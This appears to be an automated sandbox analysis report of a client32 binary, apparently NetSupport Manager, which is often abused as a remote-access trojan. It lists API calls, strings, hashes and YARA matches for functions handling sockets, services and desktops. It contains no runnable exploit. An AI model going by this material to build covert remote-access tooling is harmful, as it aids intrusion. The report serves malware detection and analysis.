                                                        Function 6C804E80 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 103libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • EnterCriticalSection.KERNEL32(6C849898,?,?,6C80BDFC,00000000), ref: 6C804E89
                                                        • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 6C804ED3
                                                        • SetLastError.KERNEL32(00000078,00000000,00000000,?,?,6C80BDFC,00000000), ref: 6C804EE8
                                                        • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 6C804F07
                                                        • SetLastError.KERNEL32(00000078,?,?,6C80BDFC,00000000), ref: 6C804F1C
                                                        • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 6C804F3B
                                                        • SetLastError.KERNEL32(00000078,?,?,6C80BDFC,00000000), ref: 6C804F5B
                                                        • closesocket.WSOCK32(?,00000000,?,?,6C80BDFC,00000000), ref: 6C804F72
                                                        • GetLastError.KERNEL32(?,00000000,?,?,6C80BDFC,00000000), ref: 6C804F7B
                                                        • _memset.LIBCMT ref: 6C804FA2
                                                        • LeaveCriticalSection.KERNEL32(6C849898,?,?,6C80BDFC,00000000), ref: 6C804FC0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3755108701.000000006C801000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C800000, based on PE: true
                                                        • Associated: 0000000B.00000002.3755083319.000000006C800000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755148279.000000006C83E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755174428.000000006C847000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755197287.000000006C848000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755197287.000000006C84C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755242929.000000006C84F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_6c800000_client32.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$AddressProc$CriticalSection$EnterLeave_memsetclosesocket
                                                        • String ID: CloseGatewayConnection - closesocket(%u) FAILED (%d)$InternetCloseHandle
                                                        • API String ID: 3117257897-3125686381
                                                        • Opcode ID: 40e355ac88f3ab2131fc0388bccb2cc7e2407c5a019a77ff50a1c79502493f67
                                                        • Instruction ID: 1001b64e8e2794ae97183bb52ecbcb8e129952c6ecd196dc67b575dce66f7fe9
                                                        • Opcode Fuzzy Hash: 40e355ac88f3ab2131fc0388bccb2cc7e2407c5a019a77ff50a1c79502493f67
                                                        • Instruction Fuzzy Hash: 9131A036284205AFD730AFA8DE84B4677B9BBE5718F215D24E80997A41D774A844CBE0
                                                        Function 1102B5C0 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 284servicesleepCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,?,00000000,19141918,1102C538,00000000,82E0FB89,?,00000000,00000000), ref: 1102B7F4
                                                        • OpenServiceA.ADVAPI32(00000000,ProtectedStorage,00000004), ref: 1102B80A
                                                        • QueryServiceStatus.ADVAPI32(00000000,?), ref: 1102B81E
                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 1102B825
                                                        • Sleep.KERNEL32(00000032), ref: 1102B836
                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 1102B846
                                                        • Sleep.KERNEL32(000003E8), ref: 1102B892
                                                        • CloseHandle.KERNEL32(?), ref: 1102B8BF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Service$CloseHandle$OpenSleep$ManagerQueryStatus
                                                        • String ID: >$NSA.LIC$NSM.LIC$ProtectedStorage
                                                        • API String ID: 83693535-2077998243
                                                        • Opcode ID: 9b98cabf2bc657b91fee656e7895e92de7935bc05c4c4817cdead5248451a21a
                                                        • Instruction ID: cf41a154579764f7ce3274c9b2e845f0c1fb444b2ec11e79c6a8ee3683002965
                                                        • Opcode Fuzzy Hash: 9b98cabf2bc657b91fee656e7895e92de7935bc05c4c4817cdead5248451a21a
                                                        • Instruction Fuzzy Hash: C7B18075E016259FDB21CF24CC84BEAB7B5AF49708F5441E9E91DAB381DB70AA80CF50
                                                        Function 11025FA0 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 131threadwindowsleepCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 11083B60: UnhookWindowsHookEx.USER32(?), ref: 11083B83
                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 11025FE4
                                                          • Part of subcall function 11102870: _malloc.LIBCMT ref: 11102889
                                                          • Part of subcall function 11102870: wsprintfA.USER32 ref: 111028A4
                                                          • Part of subcall function 11102870: _memset.LIBCMT ref: 111028C7
                                                        • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000001F4), ref: 11026053
                                                        • PostMessageA.USER32(0001042A,00000501,00000000,00000000), ref: 11026070
                                                        • SetEvent.KERNEL32(00000280), ref: 11026081
                                                        • Sleep.KERNEL32(00000032), ref: 11026089
                                                        • PostMessageA.USER32(0001042A,00000800,00000000,00000000), ref: 110260BA
                                                        • GetCurrentThreadId.KERNEL32 ref: 110260D3
                                                        • GetThreadDesktop.USER32(00000000), ref: 110260DA
                                                        • SetThreadDesktop.USER32(00000000), ref: 110260E3
                                                        • CloseDesktop.USER32(00000000), ref: 110260EE
                                                        • CloseHandle.KERNEL32(00000328), ref: 1102612E
                                                          • Part of subcall function 111035C0: GetCurrentThreadId.KERNEL32 ref: 11103656
                                                          • Part of subcall function 111035C0: InitializeCriticalSection.KERNEL32(-00000010,?,1102F49F,00000001,00000000), ref: 11103669
                                                          • Part of subcall function 111035C0: InitializeCriticalSection.KERNEL32(111DC080,?,1102F49F,00000001,00000000), ref: 11103678
                                                          • Part of subcall function 111035C0: EnterCriticalSection.KERNEL32(111DC080,?,1102F49F), ref: 1110368C
                                                          • Part of subcall function 111035C0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,1102F49F), ref: 111036B2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Thread$CriticalDesktopEventSection$CloseCreateCurrentInitializeMessagePost$EnterHandleHookMultipleObjectsSleepUnhookWaitWindows_malloc_memsetwsprintf
                                                        • String ID: Async
                                                        • API String ID: 3276504616-2933828738
                                                        • Opcode ID: b50dc5c0cc4fa15673a632a8a85fb69b85e9462f34217c182deadf66214dd1e7
                                                        • Instruction ID: 873e3f0f6254a7a416be60b73c140a8ee0daa72de0c8f2a6b091f21df20a38d3
                                                        • Opcode Fuzzy Hash: b50dc5c0cc4fa15673a632a8a85fb69b85e9462f34217c182deadf66214dd1e7
                                                        • Instruction Fuzzy Hash: D7419F76E01221AFEB11DF64CCC9F6AB7B5AB48708F104179FE25972C4EB75A800CB95
                                                        Function 111241A0 Relevance: 21.1, APIs: 5, Strings: 7, Instructions: 107COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • wsprintfA.USER32 ref: 11124210
                                                        • GetTickCount.KERNEL32 ref: 11124241
                                                        • SHGetFolderPathA.SHFOLDER(00000000,0000002B,00000000,00000000,?), ref: 11124254
                                                        • GetTickCount.KERNEL32 ref: 1112425C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CountTick$FolderPathwsprintf
                                                        • String ID: %s%s$CommonPath$HasStudentComponents=%d$Software\NSL$Warning. SHGetFolderPath took %d ms$runplugin.exe$schplayer.exe
                                                        • API String ID: 1170620360-4157686185
                                                        • Opcode ID: b0bcc0f5a6366163d0729c56afd56097aa9a4968172ae497a6bbf09a569205e6
                                                        • Instruction ID: e5427a7216b44c3460126721b628d5672ac8883cc02d2755d7c854ad9c2544d9
                                                        • Opcode Fuzzy Hash: b0bcc0f5a6366163d0729c56afd56097aa9a4968172ae497a6bbf09a569205e6
                                                        • Instruction Fuzzy Hash: 95316DBAF402156BDB009BA5BC85FEAF7BC9FA431DF500469EC04A7145EE70B600CB91
                                                        Function 6C805FC0 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 104networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ioctlsocket.WSOCK32 ref: 6C805FF2
                                                        • connect.WSOCK32(00000000,?,000001BB), ref: 6C806009
                                                        • WSAGetLastError.WSOCK32(00000000,?,000001BB), ref: 6C806010
                                                        • _memmove.LIBCMT ref: 6C806083
                                                        • select.WSOCK32(00000001,00000000,?,?,?,?,?,00001004,00000000,000001BB,00000010,00000002,00000001,00000000,?,00000000), ref: 6C8060A3
                                                        • GetTickCount.KERNEL32 ref: 6C8060C3
                                                        • ioctlsocket.WSOCK32(00000000,8004667E,00000001,00000000,?,000001BB), ref: 6C8060F3
                                                        • SetLastError.KERNEL32(00000000,00000000,8004667E,00000001,00000000,?,000001BB), ref: 6C8060F9
                                                        • WSAGetLastError.WSOCK32(00000001,00000000,?,?,?,?,?,00001004,00000000,000001BB,00000010,00000002,00000001,00000000,?,00000000), ref: 6C806111
                                                        • __WSAFDIsSet.WSOCK32(00000000,?,00000001,00000000,?,?,?,?,?,00001004,00000000,000001BB,00000010,00000002,00000001,00000000), ref: 6C806122
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3755108701.000000006C801000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C800000, based on PE: true
                                                        • Associated: 0000000B.00000002.3755083319.000000006C800000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755148279.000000006C83E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755174428.000000006C847000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755197287.000000006C848000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755197287.000000006C84C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755242929.000000006C84F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_6c800000_client32.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$ioctlsocket$CountTick_memmoveconnectselect
                                                        • String ID: ConnectTimeout$General
                                                        • API String ID: 4218156244-3585140716
                                                        • Opcode ID: 1007c662f8e14c601b624ed2c5821ba228f17ff230a167622dcb6e47c2c558ab
                                                        • Instruction ID: f5d565528d52ae3ae46be22479dafa30829e361cc8ee735450a1db608ca1edb1
                                                        • Opcode Fuzzy Hash: 1007c662f8e14c601b624ed2c5821ba228f17ff230a167622dcb6e47c2c558ab
                                                        • Instruction Fuzzy Hash: 8231BD71A043189AE730DB64CE48BDDB3B9AB44308F0049B9E90DD7641D7755AD8DBA1
                                                        Function 11025900 Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 174sleepCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _strtok.LIBCMT ref: 11025986
                                                        • _strtok.LIBCMT ref: 110259C0
                                                        • Sleep.KERNEL32(1102E263,?,*max_sessions,0000000A,00000000,00000000,00000002), ref: 11025AB4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _strtok$Sleep
                                                        • String ID: *max_sessions$Client$Error. not all transports loaded (%d/%d)$LoadTransports(%d)$Protocols$Retrying...$TCPIP$UseNCS
                                                        • API String ID: 2009458258-3774545468
                                                        • Opcode ID: cf1052e5be71f3d434893412861ad9ad259e2ba0693b2699e7433d6c9e4175ae
                                                        • Instruction ID: 451022f22904edf6d43a1c304369e541f9f29d5ed3a23b240bd98eaa3334767d
                                                        • Opcode Fuzzy Hash: cf1052e5be71f3d434893412861ad9ad259e2ba0693b2699e7433d6c9e4175ae
                                                        • Instruction Fuzzy Hash: 62514635E012669BDF01CF68CCC4BEEFBE1AF81318F5081A9DC5667280E7326445CB85
                                                        Function 6C807640 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 144COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,6C814E05), ref: 6C8076AB
                                                          • Part of subcall function 6C803A70: LoadLibraryA.KERNEL32(psapi.dll,?,6C807708), ref: 6C803A78
                                                        • GetCurrentProcessId.KERNEL32 ref: 6C80770B
                                                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 6C807718
                                                        • FreeLibrary.KERNEL32(?), ref: 6C8077FF
                                                          • Part of subcall function 6C803AB0: GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 6C803AC4
                                                          • Part of subcall function 6C803AB0: K32EnumProcessModules.KERNEL32(00000FA0,?,00000000,6C80774D,00000000,?,6C80774D,00000000,?,00000FA0,?), ref: 6C803AE4
                                                        • CloseHandle.KERNEL32(00000000,00000000,?,00000FA0,?), ref: 6C8077EE
                                                          • Part of subcall function 6C803B00: GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 6C803B14
                                                          • Part of subcall function 6C803B00: K32GetModuleFileNameExA.KERNEL32(00000FA0,?,00000000,00000104,00000000,?,6C807790,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 6C803B34
                                                          • Part of subcall function 6C802420: _strrchr.LIBCMT ref: 6C80242E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3755108701.000000006C801000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C800000, based on PE: true
                                                        • Associated: 0000000B.00000002.3755083319.000000006C800000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755148279.000000006C83E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755174428.000000006C847000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755197287.000000006C848000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755197287.000000006C84C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3755242929.000000006C84F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_6c800000_client32.jbxd
                                                        Similarity
                                                        • API ID: Process$AddressFileLibraryModuleNameProc$CloseCurrentEnumFreeHandleLoadModulesOpen_strrchr
                                                        • String ID: CLIENT247$NSM247$NSM247Ctl.dll$Set Is247=%d$is247$pcictl_247.dll
                                                        • API String ID: 2714439535-3484705551
                                                        • Opcode ID: 398ecd6f3be7eb4cbfaed041e74ef3b063add7f90cb450801c6e28e7c1cdde9e
                                                        • Instruction ID: a0d0ab821ab7463e2f7a599f9d953696833435c9a12ae20b9829755da0281b61
                                                        • Opcode Fuzzy Hash: 398ecd6f3be7eb4cbfaed041e74ef3b063add7f90cb450801c6e28e7c1cdde9e
                                                        • Instruction Fuzzy Hash: 0841C771B002189BDB30DB55CE44FEA7378BB4674CF004D79E90893640EB755A48CBE1
                                                        Function 11125790 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 84windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 11134770: _memset.LIBCMT ref: 111347B5
                                                          • Part of subcall function 11134770: GetVersionExA.KERNEL32(?,00000000,00000000), ref: 111347CE
                                                          • Part of subcall function 11134770: LoadLibraryA.KERNEL32(kernel32.dll), ref: 111347F5
                                                          • Part of subcall function 11134770: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 11134807
                                                          • Part of subcall function 11134770: FreeLibrary.KERNEL32(00000000), ref: 1113481F
                                                          • Part of subcall function 11134770: GetSystemDefaultLangID.KERNEL32 ref: 1113482A
                                                        • AdjustWindowRectEx.USER32(11130C07,00CE0000,00000001,00000030), ref: 111257D7
                                                        • LoadMenuA.USER32(00000000,000003EC), ref: 111257E8
                                                        • GetSystemMetrics.USER32(00000021), ref: 111257F9
                                                        • GetSystemMetrics.USER32(0000000F), ref: 11125801
                                                        • GetSystemMetrics.USER32(00000004), ref: 11125807
                                                        • GetDC.USER32(00000000), ref: 11125813
                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 1112581E
                                                        • ReleaseDC.USER32(00000000,00000000), ref: 11125827
                                                        • CreateWindowExA.USER32(?,NSMWClass,02D0DEC0,00CE0000,80000000,80000000,?,?,00000000,?,11000000,00000000), ref: 11125869
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: System$Metrics$LibraryLoadWindow$AddressAdjustCapsCreateDefaultDeviceFreeLangMenuProcRectReleaseVersion_memset
                                                        • String ID: F(t$NSMWClass
                                                        • API String ID: 1971969616-79798644
                                                        • Opcode ID: c4fd1fae337c8dcba66663149ed27480893a34112c7b95a9b8bf325c2f5c25ff
                                                        • Instruction ID: 3d151e6aa5795be314d149eabed09166d4b089190cfc9127ba122f3c3f80b994
                                                        • Opcode Fuzzy Hash: c4fd1fae337c8dcba66663149ed27480893a34112c7b95a9b8bf325c2f5c25ff
                                                        • Instruction Fuzzy Hash: 582165B6E40219AFDB10DFE5CC89FAEFBB8EB44704F514529FA15B7284D6B069008B90
                                                        Function 1114CE30 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 57COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GlobalAddAtomA.KERNEL32(NSMWndClass), ref: 1114CE58
                                                        • GetLastError.KERNEL32 ref: 1114CE65
                                                        • wsprintfA.USER32 ref: 1114CE78
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                          • Part of subcall function 11027FB0: _strrchr.LIBCMT ref: 110280A5
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 110280E4
                                                        • GlobalAddAtomA.KERNEL32(NSMReflect), ref: 1114CEBC
                                                        • GlobalAddAtomA.KERNEL32(NSMDropTarget), ref: 1114CEC9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AtomGlobal$ErrorExitLastProcesswsprintf$Message_strrchr
                                                        • String ID: ..\ctl32\wndclass.cpp$GlobalAddAtom failed, e=%d$NSMDropTarget$NSMReflect$NSMWndClass$m_aProp
                                                        • API String ID: 1734919802-1728070458
                                                        • Opcode ID: 5d1924ba33bc5dfec19d76dfc76a92801d5f3f97a695d21cd7be10a704ebc820
                                                        • Instruction ID: 1eda9b10f8aec855e66c0cb12e8f2ce1967035abfcae5e92ab0cd4d6df15dcd3
                                                        • Opcode Fuzzy Hash: 5d1924ba33bc5dfec19d76dfc76a92801d5f3f97a695d21cd7be10a704ebc820
                                                        • Instruction Fuzzy Hash: 64110A79E01354EBC720EFE6DCC5B96FBB4BF24318B40462ED86553644EB706540CBA1
                                                        Function 111035C0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 132threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 11102870: _malloc.LIBCMT ref: 11102889
                                                          • Part of subcall function 11102870: wsprintfA.USER32 ref: 111028A4
                                                          • Part of subcall function 11102870: _memset.LIBCMT ref: 111028C7
                                                        • std::exception::exception.LIBCMT ref: 1110362A
                                                        • __CxxThrowException@8.LIBCMT ref: 1110363F
                                                        • GetCurrentThreadId.KERNEL32 ref: 11103656
                                                        • InitializeCriticalSection.KERNEL32(-00000010,?,1102F49F,00000001,00000000), ref: 11103669
                                                        • InitializeCriticalSection.KERNEL32(111DC080,?,1102F49F,00000001,00000000), ref: 11103678
                                                        • EnterCriticalSection.KERNEL32(111DC080,?,1102F49F), ref: 1110368C
                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,1102F49F), ref: 111036B2
                                                        • LeaveCriticalSection.KERNEL32(111DC080,?,1102F49F), ref: 1110373F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
